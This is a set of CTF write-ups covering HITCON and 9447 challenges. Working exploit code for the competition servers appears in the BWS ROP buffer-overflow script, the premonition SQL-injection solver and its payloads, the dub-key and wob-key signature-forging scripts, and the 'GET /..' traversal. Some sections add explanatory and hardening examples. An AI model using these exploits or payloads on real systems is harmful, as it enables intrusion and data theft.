After checking the source code of the challenge, it was clear that the flag was used for two purposes: as AES key and as an IV.

AES is secure enough that we cannot crack the key directly, but we can find out the IV with the following ‘trick’ (the images at https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#CBC are always a good source of material to help think through what happens):

I replaced the first block of the example encrypted text with the second block (so the blocks were now in the following order: c2|c2|c3). I kept the third block so the padding remained correct, and I decrypted it.

Encrypted: e04f07e4dcd6cf096b47ba48b357814ee04f07e4dcd6cf096b47ba48b357814e4a89ef1cfad33e1dd28b892ba7233285
Decrypted: 7e009b446efd0ba5221b7f1a13f34ce9cc7bf2c48246e4e51f7cb53eda8495e36865206c617a7920646f67

If we write down how the encrypted blocks were created, we get this (p = plaintext, c = ciphertext, ^ = xor, E = AES encrypt, || = block boundary):

original ciphertext: c1 = E(p1 ^ IV)  ||  c2 = E(p2 ^ c1)  ||  c3 = E(p3 ^ c2)
modified ciphertext: c2 = E(p2 ^ c1)  ||  c2 = E(p2 ^ c1)  ||  c3 = E(p3 ^ c2)
decrypted modified ciphertext: dec1 = p2 ^ c1 ^ IV  ||  ...

So if we want to know the IV (=FLAG), we can compute it this way: IV = dec1 ^ p2 ^ c1, as we know all the ‘variables’.

Here is my C# code which does exactly this:

static void LetsDecrypt()
{
    var cSample = Conversion.HexToBytes("4a5b8d0034e5469c071b60000ca134d9e04f07e4dcd6cf096b47ba48b357814e4a89ef1cfad33e1dd28b892ba7233285");
    var pSample = Encoding.Default.GetBytes("The quick brown fox jumps over the lazy dog");
    var cFake = Conversion.HexToBytes("e04f07e4dcd6cf096b47ba48b357814ee04f07e4dcd6cf096b47ba48b357814e4a89ef1cfad33e1dd28b892ba7233285");
    var pFake = Conversion.HexToBytes("7e009b446efd0ba5221b7f1a13f34ce9cc7bf2c48246e4e51f7cb53eda8495e36865206c617a7920646f67".Replace(" ", ""));
    var block2input = CryptoUtils.Xor(cSample.Take(16).ToArray(), pSample.Skip(16).Take(16).ToArray());
    var dec1 = pFake.Take(16).ToArray(); // c1 ^ p2 ^ flag
    var flag = Encoding.Default.GetString(CryptoUtils.Xor(dec1, block2input));
}

The flag was

hitcon{R4nd0m IV plz XD}
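
The relation IV = dec1 ^ p2 ^ c1 does not depend on AES. The following added example (not code from the original write-up) recomputes the IV from the first blocks quoted above, then repeats the c2|c2|c3 swap against a stand-in cipher to show that with an independent IV the same XOR yields only the already public IV. The toy Feistel cipher, the sample key and all function names are assumptions made for the illustration.

```python
import hashlib

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    # Round function of the stand-in cipher (NOT AES): 8 bytes of a keyed hash.
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def toy_encrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _round(key, i, r))
    return l + r

def toy_decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _round(key, i, l)), l
    return l + r

def cbc_encrypt(key, iv, plaintext):
    pad = BLOCK - len(plaintext) % BLOCK
    data = plaintext + bytes([pad]) * pad
    prev, out = iv, b""
    for i in range(0, len(data), BLOCK):
        prev = toy_encrypt_block(key, xor(data[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    prev, out = iv, b""
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out += xor(toy_decrypt_block(key, block), prev)
        prev = block
    pad = out[-1]
    if not 1 <= pad <= BLOCK or out[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding")
    return out[:-pad]

def recover_iv(c1, p2, dec1):
    # dec1 = D(c2) ^ IV and D(c2) = p2 ^ c1, hence IV = dec1 ^ p2 ^ c1.
    return xor(xor(dec1, p2), c1)

def page_values_iv():
    # First ciphertext block of the sample and first block of the decrypted
    # c2|c2|c3 message, both copied from the hex strings in the write-up.
    c1 = bytes.fromhex("4a5b8d0034e5469c071b60000ca134d9")
    dec1 = bytes.fromhex("7e009b446efd0ba5221b7f1a13f34ce9")
    p2 = b"The quick brown fox jumps over the lazy dog"[16:32]
    return recover_iv(c1, p2, dec1)

def swap_trick(key, iv):
    # What a decryption service reveals for c2|c2|c3 under the given key and IV.
    msg = b"The quick brown fox jumps over the lazy dog"
    ct = cbc_encrypt(key, iv, msg)
    forged = ct[16:32] + ct[16:32] + ct[32:]   # third block kept: padding stays valid
    dec = cbc_decrypt(key, iv, forged)
    return recover_iv(ct[:16], msg[16:32], dec[:16])

if __name__ == "__main__":
    key = b"0123456789abcdef"                  # constructed sample key
    print("IV from the page's blocks:", page_values_iv())
    print("key reused as IV leaks   :", swap_trick(key, key))
    print("independent IV leaks only:", swap_trick(key, b"\x11" * 16))
```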

Saved payload as pyc with this script:

import marshal, zlib, base64

open('code.pyc','wb').write('03f30d0a5a8cbc52'.decode('hex') + zlib.decompress(base64.b64decode('eJyNVktv...kLHmeCBQ==')))

Disassembled the pyc file with uncompyle:

~/ctf/hitcon2016$ uncompyle6 code.pyc
# Python 2.7 (decompiled from Python 2.7)
# Embedded file name: <string>
# Compiled at: 2013-12-26 21:06:50


def main--- This code section failed: ---

   1       0    LOAD_GLOBAL       'chr'
           3    LOAD_CONST        108
           6    CALL_FUNCTION_1   ''
           9    LOAD_GLOBAL       'chr'
          12    LOAD_CONST        108
          15    CALL_FUNCTION_1   ''
          18    LOAD_GLOBAL       'chr'
          21    LOAD_CONST        97
...

Simulated the string creation with this C# code:

static void HandcraftedPyc()
{
    // Call me a Python virtual machine! I can interpret Python bytecodes!!!
    var cmds = File.ReadAllLines(@"disas.txt").Select(x => Regex.Match(x, @"(.*?)\s+(.*)").Groups.OfType<Group>().Skip(1).Select(g => g.Value).ToArray()).ToArray();
    var stack = new Stack<string>();
    foreach (var cmd in cmds)
    {
        if (cmd[0] == "LOAD_GLOBAL" || cmd[0] == "LOAD_CONST")
            stack.Push(cmd[1]);
        else if (cmd[0] == "CALL_FUNCTION_1")
        {
            var arg = stack.Pop();
            var func = stack.Pop();
            if (func == "'chr'")
                stack.Push("" + (char)int.Parse(arg));
            else
                Debugger.Break();
        }
        else if (cmd[0] == "ROT_TWO")
        {
            var arg1 = stack.Pop();
            var arg2 = stack.Pop();
            stack.Push(arg1);
            stack.Push(arg2);
        }
        else if (cmd[0] == "BINARY_ADD")
        {
            var arg1 = stack.Pop();
            var arg2 = stack.Pop();
            stack.Push(arg2 + arg1);
        }
        else
            Debugger.Break();
    }
}

At the end the stack contains one variable, the ‘decrypted’ string. The first code block created the string “Call me a Python virtual machine! I can interpret Python bytecodes!!!”, while the second code block created the flag:

hitcon{Now you can compile and run Python bytecode in your brain!}

Fibbed

This challenge was solved by and the write up was written by one of my teammates, NGG.

The task was to crack a Diffie-Hellman key exchange in a group where elements correspond to Fibonacci numbers.

The base element was the 2-by-2 matrix [[0,1],[1,1]], and the group was what this base generates over a finite field of a given prime order.

All elements of this group have the form [[a,b],[b,a+b]], so the public keys (the group elements) were represented by (a,b) pairs, and the private keys were represented by the exponent.

I simply used the https://en.wikipedia.org/wiki/Baby-step_giant-step algorithm to compute the discrete logarithm of the server’s public keys.

I needed a hash table with 900 million elements in order to do so, and had to use 128-bit arithmetic for internal computations, but these are not a problem on x64 Linux if you have 64 GB RAM.

The program below used 49 GB RAM and ran for about 20 minutes on a single core.

After finding the private key of the server, the following python script printed the flag.

text = '59719af4dbb78be07d0398711c0607916dd59bfa57b297cd220b9d2d7d217f278db6adca88c9802098ba704a18cce7dd0124f8ce492b39b64ced0843862ac2a6'
p = 981725946171163877
server_secret = 173288873*900000000+31300133
client_public = (453665378628814896,152333692332446539)
print decrypt(text, str(calcM(p, server_secret, client_public)))

#include <unordered_map>
#include <utility>
#include <iostream>

using namespace std;

typedef long long ll;
typedef __int128 lll;
typedef pair<ll,ll> pll;

const ll P = 981725946171163877LL;

void mul(pll& a, const pll& b)
{
	ll t = a.first;
	a.first = (ll)(((lll)a.first*(lll)b.first + (lll)a.second*(lll)b.second)%(lll)P);
	a.second = (ll)(((lll)t*(lll)b.second + (lll)a.second*((lll)b.second+(lll)b.first))%(lll)P);
}

namespace std {
	template <> struct hash<pll> {
		size_t operator()(const pll& x) const {
			return (x.first * 0x1f1f1f1f1f1f1f1fLL) ^ x.second;
		}
	};
};

int main(void)
{
	const pll a {0,1};
	const pll b {58449491987662952LL,704965025359609904LL};
	const int m = 900000000;
	const pll ainvm {725806600419337472LL,354774678182469598LL}; // This is a**(-m)
	unordered_map<pll, int> jmap;
	jmap.reserve(m);
	pll aj {1,0};
	int cnt = 0;
	for (int j = 0; j < m; j++) {
		if (cnt == 0) { cerr << "."; cnt = 10000000; } else cnt--;
		jmap.insert(std::make_pair(aj, j));
		mul(aj, a);
	}
	cout << "P2 " << jmap.size() << endl;
	pll ls = b;
	cnt = 0;
	for (ll i = 0; i < 1100000000LL; i++) {
		if (cnt == 0) { cerr << "."; cnt = 10000000; } else cnt--;
		auto it = jmap.find(ls);
		if (it != jmap.end()) {
			cout << endl;
			cout << "i=" << i << endl;
			cout << "m=" << m << endl;
			cout << "ls=" << ls.first << "," << ls.second << endl;
			cout << "j=" << it->second << endl;
		}
		mul(ls, ainvm);
	}
	return 0;
}

The flag was:

9447{Pisan0_mU5t_nEv3r_hAve_THougHt_0f_bruTe_f0rce5}
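
The same baby-step giant-step search at a size that runs in milliseconds, as an added Python example (not the teammate's code). It uses the (a,b) representation and multiplication rule from the C++ program, and also shows how the a**(-m) step, which that program hard-codes, can be computed. The small prime 1000003, the secret exponents and the function names are constructed for the illustration; the search bound relies on the order of [[0,1],[1,1]] modulo a prime p dividing p-1 or 2(p+1).

```python
from math import isqrt

IDENTITY = (1, 0)   # [[1,0],[0,1]] in the (a,b) form [[a,b],[b,a+b]]
G = (0, 1)          # the base matrix [[0,1],[1,1]]

def mul(x, y, p):
    # Product of two matrices of the form [[a,b],[b,a+b]], kept as (a,b).
    a1, b1 = x
    a2, b2 = y
    return ((a1 * a2 + b1 * b2) % p, (a1 * b2 + b1 * (a2 + b2)) % p)

def power(x, n, p):
    # Square-and-multiply exponentiation in the group.
    result = IDENTITY
    while n:
        if n & 1:
            result = mul(result, x, p)
        x = mul(x, x, p)
        n >>= 1
    return result

def inverse(x, p):
    # det = a(a+b) - b^2; the inverse matrix is again of the same form.
    a, b = x
    det_inv = pow((a * (a + b) - b * b) % p, -1, p)   # Python 3.8+
    return ((a + b) * det_inv % p, -b * det_inv % p)

def bsgs(g, h, p, bound):
    # Find x in [0, bound] with g**x == h, using about sqrt(bound) memory.
    m = isqrt(bound) + 1
    table = {}
    cur = IDENTITY
    for j in range(m):                 # baby steps: g**j for j < m
        table.setdefault(cur, j)
        cur = mul(cur, g, p)
    step = inverse(power(g, m, p), p)  # g**(-m)
    cur = h
    for i in range(m + 1):             # giant steps: h * g**(-i*m)
        j = table.get(cur)
        if j is not None:
            return i * m + j
        cur = mul(cur, step, p)
    return None

if __name__ == "__main__":
    p = 1000003                        # constructed small prime
    server_secret = 123457             # constructed private exponent
    server_public = power(G, server_secret, p)
    x = bsgs(G, server_public, p, 2 * (p + 1))
    print("recovered exponent:", x)
    print("matches public key:", power(G, x, p) == server_public)
```

The table holds about sqrt(bound) entries, which is why the 60-bit prime in the challenge needed 900 million of them; a group whose order makes that table infeasible is what keeps this search out of reach.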

randBox

This challenge was solved by and the write up was written by one of my teammates, nguyen.

There are 10 rounds; some rounds were done manually, e.g. round 1 is a rot-N substitution; round 2 is a transposition; rounds 3->5 can be cracked using the round 1 approach; …

The flag was

9447{crYpt0_m4y_n0T_Be_S0_haRD}

dub-key

This challenge was solved by and the write up was written by one of my teammates, NGG.

This code cracks the signature scheme:

import base64
from fractions import gcd
from pwn import *
import traceback
import hashlib

def solve():
	with remote('dub-key-t8xd5pn6.9447.plumbing', 9447) as r:
		s = r.recv(12)
		print 'SHA'
		for i in xrange(10000000, 100000000):
			ss = s + str(i)
			if hashlib.sha1(ss).digest().endswith('\x00\x00\x00'):
				break
		print 'SHAOK'
		r.send(ss)
		r.recvline()
		tosign = map(ord, base64.b64decode(r.recv(172)))
		print 'TOSIGN', tosign
		for i in xrange(128):
			if tosign[i] == i+128:
				for j in xrange(128):
					if i == j:
						continue
					if tosign[j] == i+128:
						break
				else:
					break
		else:
			assert(False)
		print 'I', i
		g = None
		for j in xrange(50):
			r.recvline()
			r.recvline()
			r.recvline()
			r.sendline('1')
			r.send(base64.b64encode(''.join(map(chr, tosign[:i] + [j] + tosign[i+1:]))))
			line = r.recvline()
			print 'LINE', line
			x = int(line)
			if j == 0:
				g = x
			else:
				g = gcd(g, x)
		r.sendline('2')
		x = str(g)
		assert(len(x) <= 620)
		x = x + ' '*(620-len(x))
		r.send(x)
		print r.recvall()

while True:
	try:
		solve()
		break
	except:
		traceback.print_exc()

The flag was:

9447{Th1s_ta5k_WAs_a_B1T_0F_A_DaG}

wob-key & wob-key-hard

This challenge was solved by and the write up was written by one of my teammates, NGG.

After a few hours of trial and failure, I came up with the following solution:

import base64
from fractions import gcd
from pwn import *
import traceback
import random
import hashlib
import os

def cycleLen(data, place):
	seen = {};
	count = 0;
	while not place in seen:
		seen[place] = 1;
		count += 1;
		place = data[place];
	return count;

def realSign(data):
	res = 1;
	for i in range(256):
		res *= cycleLen(data, i);
	return res;

def solve():
	with remote('wob-key-e1g2l93c.9447.plumbing', 9447) as r:
		ats = [129+i for i in xrange(126)] + [254]
		bts = [128] + [128+i for i in xrange(126)]
		cts = [128+i for i in xrange(128)]
		dts = [[i for i in xrange(128)], [127-i for i in xrange(128)], [(i+50)%128 for i in xrange(128)]]
		for i in xrange(10):
			dts.append(map(ord, os.urandom(128)))
		s = r.recv(12)
		print 'SHA'
		for i in xrange(10000000, 100000000):
			ss = s + str(i)
			if hashlib.sha1(ss).digest().endswith('\x00\x00\x00'):
				break
		print 'SHAOK'
		r.send(ss)
		def sign(data):
			r.recvline()
			r.recvline()
			r.recvline()
			r.sendline('1')
			r.send(base64.b64encode(''.join(map(chr, data))))
			line = r.recvline().strip()
			print 'LINE', line
			return int(line)
		c1 = sign(cts)
		cts[191-128] = 255
		cts[255-128] = 191
		c2 = sign(cts)
		print 'C1', c1
		print 'C2', c2
		assert(4*c1 == c2)
		d = []
		for dtss in dts:
			d.append(sign(dtss))
		print 'D', d
		a = sign(ats + [255])
		print 'A', a
		b = sign(bts + [255])
		print 'B', b
		al = []
		bl = []
		sec = []
		for i in xrange(128):
			print i
			al.append(sign(ats + [i]))
			bl.append(sign(bts + [i]))
			assert(al[i]%a == 0)
			assert(bl[i]%b == 0)
			ad = al[i]//a - 1
			bd = bl[i]//b - 1
			assert(ad != bd)
			assert((ad+bd-(255-127))%2 == 0)
			assert((bd-ad+(255+127))%2 == 0)
			assert(((bd-ad+(255+127))//2) >= 128)
			assert(((bd-ad+(255+127))//2) < 256)
			print 'PAIR', ((ad+bd-(255-127))//2, (bd-ad+(255+127))//2)
			sec.append((int((ad+bd-(255-127))//2), int((bd-ad+(255+127))//2)))
		print 'AL', al
		print 'BL', bl
		print 'SEC', sec
		psk = [None]*128
		db = 1
		for x in xrange(1, 500):
			for i in xrange(128):
				if sec[i][0] == x:
					if x == 1:
						psk[i] = [sec[i][1]]
					else:
						psk[i] = []
						for j in xrange(128):
							if sec[j][0] == x-1 and sec[j][1] == sec[i][1]:
								psk[i].append(j)
						assert(len(psk[i]) > 0)
						db *= len(psk[i])
		for i in xrange(128):
			assert(psk[i] is not None)
		print 'DB', db
		assert(db < 100000)
		for i in xrange(1000000000):
			if i%1000 == 0:
				print 'N',
			secret = map(lambda p: random.choice(p), psk)
			assert(a == realSign(secret + ats + [255]))
			assert(b == realSign(secret + bts + [255]))
			for di in xrange(len(dts)):
				myd = realSign(secret + dts[di])
				if d[di] != myd:
					break
			else:
				break
		for i in xrange(128):
			assert(al[i] == realSign(secret + ats + [i]))
			assert(bl[i] == realSign(secret + bts + [i]))
		print 'L1', r.recvline().strip()
		print 'L2', r.recvline().strip()
		print 'L3', r.recvline().strip()
		r.sendline('2')
		for i in xrange(17):
			print 'L4', r.recvline().strip()
			line = r.recvline().strip()
			print 'CHECK', line
			ts = map(ord, base64.b64decode(line))
			assert(len(ts) == 128)
			s = realSign(secret + ts)
			print 'SIGN', s
			x = str(s)
			assert(len(x) <= 620)
			x = x + ' '*(620-len(x))
			print 'X', x
			r.send(x)
		print r.recvall()

while True:
	try:
		solve()
		break
	except:
		traceback.print_exc()

The flags were:

9447{S1gning_15_HaRD_0Bvi0Usly}
9447{Alth0ugh_be1Ng_sm4rt_iS_eVen_b3tter}

calcpop

This challenge was solved by and the write up was written by one of my teammates, nguyen.

It was a simple buffer overflow vulnerability.

The flag was

9447{shELl_i5_easIEr_thaN_ca1c}

calcpop reloaded

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Steps to solve the challenge:

  • set up the environment for calc_reloaded with the RedOS package
  • get EIP control and arbitrary code execution in calc_reloaded
  • make shellcode for this OS
  • use the getdirent syscall to find out the name of the flag file Mes5 wi+h the b3st, d1e l1k3 the rest

The flag was

9447{th1s_O5_is_a_gl0rifi3d_c4lculat0r}

cards

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Steps to solve the challenge:

  • get a .text address on the stack after playing the game
  • send a payload to leak one of these addresses
  • send a payload to corrupt the return address on the stack
  • make it return to printFlag

The flag was

9447{ThE_Only_w1nn1Ng_M0ve_1S_t0_stEAl_The_flAg}

BWS

This challenge was solved by and the write up was written by one of my teammates, nguyen.

The vulnerability was in the URL parsing function. If you passed /../ as a URL, it could read before the output buffer until the next “/” character.

The exploit code was:

from pwn import *
context.arch = 'amd64'

#pwn
r = remote('bws-ad8sfsklw.9447.plumbing', 80)
#r = remote('localhost', 33000)

raw_input('attach')

# stage 1 : prepare 0x2f
payload = ''
payload += 'GET '
payload += '/'*200
payload += ' HTTP/1.1\r\n\r\n'
r.send( payload )
print r.recv(8192)

# stage 2 : start ROP 
payload = ''
payload += 'GET /../'
payload += 'A'*8
payload += 'B'*8
payload += 'C'*8
payload += 'D'*8
payload += 'E'*8
payload += 'F'*8
payload += 'G'*8
payload += 'H'*8
payload += 'I'*8
payload += '1234\x39\x0f\x408'	# magic lifting!!
payload += 'kkk'
payload += pack(0x00000d6666666666)
payload += pack(0)
payload += '1'*8
payload += '22222'

'''
pattern 5fc3 found at 0x401323
POP RDI; RET; 
pattern 5e415fc3 found at 0x401321
POP RSI; POP R15; RET; 
'''

RDIRET = 0x401323
RSIR15RET = 0x401321
FILEBUF = 0x612010
READ = 0x400ae0 # buf, size
PRINT = 0x40115e # -

# READ(&filebuf, 0x30) -> PRINT FILE.
#payload += pack(RDIRET)
#payload += pack(FILEBUF)	# rdi
#payload += pack(RSIR15RET)
#payload += pack(0x30)	# rsi
#payload += pack(READ)
#payload += pack(RDIRET)
#payload += pack(FILEBUF)
payload += pack(PRINT)
payload += '/../flag.txt\x00'
payload += ' HTTP/1.1\r\n\r\n'
r.send( payload )

# get flag.
print r.recv(8192)
print r.recv(8192)
print r.recv(8192)
#r.interactive()

Running it on the real server gave us the flag:

Accept-Ranges: bytes
Connection: close
9447{1_h0pe_you_L1ked_our_w3b_p4ge}
*** stack smashing detected ***: /ho

Get help

The flag was in the topic of the official 9447 CTF IRC channel #9447ctf on freenode:

9447{Ask_for_help_here}

4w1h

We had to find a few locations by their Google Street View images. After finding the exact locations, we had to collect the directions where the little man looked.

These are the URLs of the Google Street View images and the directions which gave us the flag (the text of each URL is the place it depicts or the one that could be identified most easily):

The flag was:

9447{NWSNSEWNENWWNS}

Recon 1

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Steps to solve the challenge:

In the meantime, have a flag: 9447{YouAreStalKey}

Recon 2

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Steps to solve the challenge:

The flag was:

9447{william.clutterbuck}

flag finder

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Simple: run it!

The flag was:

9447{C0ngr47ulaT1ons_p4l_buddy_y0Uv3_solved_the_H4LT1N6_prObL3M_n1c3_}

The real flag finder

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Lot of math stuff, it will give the flag - lol NOT :)

Steps to solve the challenge:

  • just start gdb
  • run the program
  • put a breakpoint where it writes that you lost
  • read the flag from the memory (it stores it and compares it with your input)

The flag was:

9447{C0ngr47ulaT1ons_p4l_buddy_y0Uv3_solved_the_re4l__H4LT1N6_prObL3M}

danklang

This challenge was solved by and the write up was written by one of my teammates, VEK.

The code first had to be converted to some real language like python.

After this, it was still slow and ate a lot of memory, so it had to be optimized.

I wrote a C++ version that replaced the recursions with dynamic programming:

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
#include <gmpxx.h>
 
#define N 13380000
 
using namespace std;
 
bool prime (unsigned num, unsigned whatever)
{
  for (unsigned i=2; i*i<=num; ++i)
    {
      if (num%i == 0)
        return false;
    }
  return true;
}
 
mpz_class bill (int memes);
mpz_class such (int memes);
 
mpz_class ef[N];
 
mpz_class epicfail (int memes)
{
  if (memes < 0)
    return 0;
  return ef[memes];
}
 
void epicfail_fill (unsigned memes)
{
  if (ef[memes] != -1)
    return;
  mpz_class wow = 0;
  bool dank = true;
  if (memes > 1)
    {
      dank = prime (memes, 2);
      if (dank)
        wow = bill (memes - 1) + 1;
      else
        wow = such (memes - 1);
    }
  ef[memes] = wow;
}
 
mpz_class dd[N][6];
 
mpz_class dootdoot (int memes, unsigned seals)
{
  if (memes < 0)
    return 0;
  return dd[memes][seals];
}
 
void dootdoot_fill (unsigned memes, unsigned seals)
{
  if (dd[memes][seals] != -1)
    return;
  mpz_class doritos = 0;
  if (seals <= memes)
    {
      if (seals == 0)
        doritos = 1;
      else
        {
          if (seals == memes)
            doritos = 1;
          else
            {
              doritos = dootdoot (memes-1, seals-1);
              doritos = dootdoot (memes - 1, seals) + doritos;
            }
        }
    }
  dd[memes][seals] = doritos;
}
 
 
mpz_class bm[N];
 
mpz_class brotherman (int memes)
{
  if (memes < 0)
    return 0;
  return bm[memes];
}
 
void brotherman_fill (unsigned memes)
{
  if (bm[memes] != -1)
    return;
 
  mpz_class hues = 0;
  if (memes != 0)
    {
      if (memes < 3)
        hues = 1;
      else
        {
          hues = brotherman(memes - 1);
          hues = brotherman(memes - 2) + hues;
        }
    }
  hues = hues % mpz_class (987654321);
  bm[memes] = hues;
}
 
mpz_class s[N];
 
mpz_class such (int memes)
{
  if (memes < 0)
    return 0;
  return s[memes];
}
 
void such_fill (unsigned memes)
{
  if (s[memes] != -1)
    return;
 
  mpz_class wow = dootdoot (memes, 5);
  mpz_class wew;
  if (wow % 7 == 0)
    {
      wew = bill (memes - 1);
      wow = wow + 1;
    }
  else
    wew = epicfail (memes - 1);
 
  wow = wew + wow;
  s[memes] = wow;
}
 
mpz_class bi[N];
 
mpz_class bill (int memes)
{
  if (memes < 0)
    return 0;
  return bi[memes];
}
 
void bill_fill (unsigned memes)
{
  if (bi[memes] != -1)
    return;
 
  mpz_class wow = brotherman (memes);
  mpz_class wew;
  if (wow % 3 == 0)
    {
      wew = such (memes - 1);
      wow = wow + 1;
    }
  else
    wew = epicfail (memes - 1);
 
  wow = wew + wow;
  bi[memes] = wow;
}
 
int main (int argc, char **argv)
{
  for (unsigned i = 0; i < N; ++i)
    {
      ef[i] = -1;
      for (unsigned j = 0; j < 6; ++j)
        dd[i][j] = -1;
      s[i] = -1;
      bm[i] = -1;
      bi[i] = -1;
    }
  for (unsigned i = 0; i < N; ++i)
    for (unsigned j = 0; j < 6; ++j)
      dootdoot_fill (i, j);
  for (unsigned i = 0; i < N; ++i)
    {
      brotherman_fill (i);
      epicfail_fill (i);
      bill_fill (i);
      such_fill (i);
    }
  cout << epicfail (13379447) << endl;
  return 0;
}

Hello, Joe

This challenge was solved by and the write up was written by one of my teammates, nguyen.

In the CTF, many teams solved it fast, so maybe it was not too hard; I decompiled the code and got it fast:

9447{94ea5e32f2b5b37d947eea3a38932ae1}

imaged

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Flag is the CRC of the first 7 chunks:

9447{Steg0_redunDaNcy_CHeck}

binned

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Flag is the id of syscalls executed:

fork getpeername getpeername getsockopt setfsgid shmdt getgid getsockname sysinfo geteuid umask shutdown setresuid rmdir umask ftruncate getpgid umask shmdt getpeername bind bind setuid getdents syslog umask shmdt shutdown times msgsnd capget

The flag was:

9447{Ch3ck_0uT_My_C411iNg_C0dE}

gife up now

This was an animgif with a lot of QR codes.

The QR codes contained words multiple times.

The occurrence count of the words gave us the following sequence:

1,4,3,4,4,4,1,4,3,4,3,4,4,4,1,4,3,4,4,4,1,4,5,4,4,4

The QR code text contained the hint for the challenge:

two parts, all lower, add 9447{ to start and } to the end, first looks like “7do”, cut off 450ms, second like https://www.youtube.com/watch?v=5xxTkB5bGy4 like faucet script

The delay between some frames was 400ms, and 500ms for others. Interpreting this as morse code (500ms = -, 400ms = .) gives us this sequence:

-..-----...-..--------...-..-----...-..-----...-..--------...-..--------...-..--------...

Although we did not know where the pauses were, we could use the fact from the hint that the alphabet only contained “7do” characters.

7 = −−•••
d = −••
o = −−−

This gave us the following form:

-.. --- --... -.. --- --- --... -.. --- --... -.. --- --... -.. --- --- --... -.. --- --- --... -.. --- --- --...

Which was translated to ASCII from morse:

DO7DOO7DO7DO7DOO7DOO7DOO7

The second part of the hint suggested that we should use Tap code:

. ....  ... ....  .... ....  . ....  ... ....  ... ....  .... ....  . ....  ... ....  .... ....  . ....  ..... ....  .... ....

Which translates to:

dotdootdotdyt

The final flag was:

9447{do7doo7do7do7doo7doo7doo7dotdootdotdyt}

sanutf8y_check

The challenge description gave us the following website: http://sanutf8y-check-n2wisexx.9447.plumbing which contained the flag with unicode characters. Writing them down with normal ASCII characters gave us the flag the scoreboard accepted.

YWS

Sending GET /.. HTTP/1.1 with nc listed the file names from the parent directory (outside files), and one of the directory names was the flag.

premonition

The vulnerability was an SQL injection in the operator string.

Error text leaked, from which I saw spaces were removed (also I had to send a valid user-agent).

I solved the problem with a boolean-based technique (it could be solved much more easily, though). First I got the table names and found the s3ekr17_passwords table.

Then I requested its contents. Each row was a (userid, password) tuple, where the password was only one character from the flag and the userid was the position of the character in the string.

A part of my solver code:

var http = new HttpClient { BeforeRequest = req => req.UserAgent = "Mozilla/5.0" };

Func<string, bool> sqli = query =>
{
    var resp = http.Req("http://premonition-p8l05mpz.9447.plumbing:9447/score", "score=0&ineq=<(?)or(" + query + ")--").AsString;
    if (resp == "[]\n")
        return false;
    else if (resp.StartsWith("[[\"Xavier\", "))
        return true;
    else
        throw new Exception("SQL error: " + resp);
};

//var tableNames = BinarySearchUtils.BinarySearchText((idx, num) => sqli("SELECT(unicode(substr(name," + (idx + 1) + ",1))<" + num + ")FROM(sqlite_master)LIMIT(1)"));
//var rowCount = BinarySearchUtils.BinarySearchNum(i => sqli("SELECT(count(*)<" + i + ")FROM(s3ekr17_passwords)"), 0, 50);

for (int userId = 0; userId < 45; userId++)
{
    var leak = BinarySearchUtils.BinarySearchText((idx, num) => sqli("SELECT(unicode(substr(userid||'|'||password," + (idx + 1) + ",1))<" + num + ")FROM(s3ekr17_passwords)LIMIT(" + userId + "),(1)"));
    Console.WriteLine("User #" + userId + ": " + leak);
    File.AppendAllText("leak.txt", leak + "\r\n");
}
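
A comparison operator cannot be bound as a query parameter, so the fix for this class of bug is an allowlist. The following added Python example (not the challenge's server code, which is not shown in this write-up) puts a hypothetical reconstruction of the handler next to a hardened version. The `scores` table, its rows and the function names are assumptions; the `ineq` payload shape and the `s3ekr17_passwords` table name are taken from the solver above.

```python
import sqlite3

def make_db():
    # Constructed sample data; only the s3ekr17_passwords name comes from the write-up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE scores (name TEXT, score INTEGER)")
    db.executemany("INSERT INTO scores VALUES (?, ?)",
                   [("Xavier", 100), ("Yolanda", 50)])
    db.execute("CREATE TABLE s3ekr17_passwords (userid INTEGER, password TEXT)")
    db.execute("INSERT INTO s3ekr17_passwords VALUES (0, 'X')")
    return db

def scores_vulnerable(db, score, ineq):
    # Hypothetical 'before': the operator is pasted into the SQL text.
    # Stripping spaces (the filtering the write-up observed) does not help,
    # because parentheses separate SQL tokens just as well.
    ineq = ineq.replace(" ", "")
    sql = "SELECT name, score FROM scores WHERE score " + ineq + " ? ORDER BY name"
    return db.execute(sql, (score,)).fetchall()

ALLOWED_OPERATORS = {"<": "<", "<=": "<=", "=": "=", ">=": ">=", ">": ">"}

def scores_hardened(db, score, ineq):
    # 'After': the request value only selects one of a fixed set of SQL
    # fragments; it never reaches the query text itself.
    try:
        op = ALLOWED_OPERATORS[ineq]
    except KeyError:
        raise ValueError("unsupported comparison operator") from None
    sql = "SELECT name, score FROM scores WHERE score " + op + " ? ORDER BY name"
    return db.execute(sql, (int(score),)).fetchall()

def boolean_oracle(db, condition):
    # With score=0 no row satisfies "score < 0", so the vulnerable handler
    # returns rows exactly when the injected condition is true: an empty
    # versus non-empty response is the one-bit leak the solver relied on.
    return bool(scores_vulnerable(db, 0, "<(?)or(" + condition + ")--"))

if __name__ == "__main__":
    db = make_db()
    print(boolean_oracle(db, "SELECT(count(*)<50)FROM(s3ekr17_passwords)"))
    print(boolean_oracle(db, "SELECT(count(*)<0)FROM(s3ekr17_passwords)"))
    try:
        scores_hardened(db, 0, "<(?)or(1=1)--")
    except ValueError as exc:
        print("hardened handler rejected the operator:", exc)
```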

nicklesndimes

The website used the same framework as the CTF, where I could reset the admin’s password, and whitelist my IP address with the code found in the main javascript file of the site (although I had to log in with another user to make this work).

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Execute

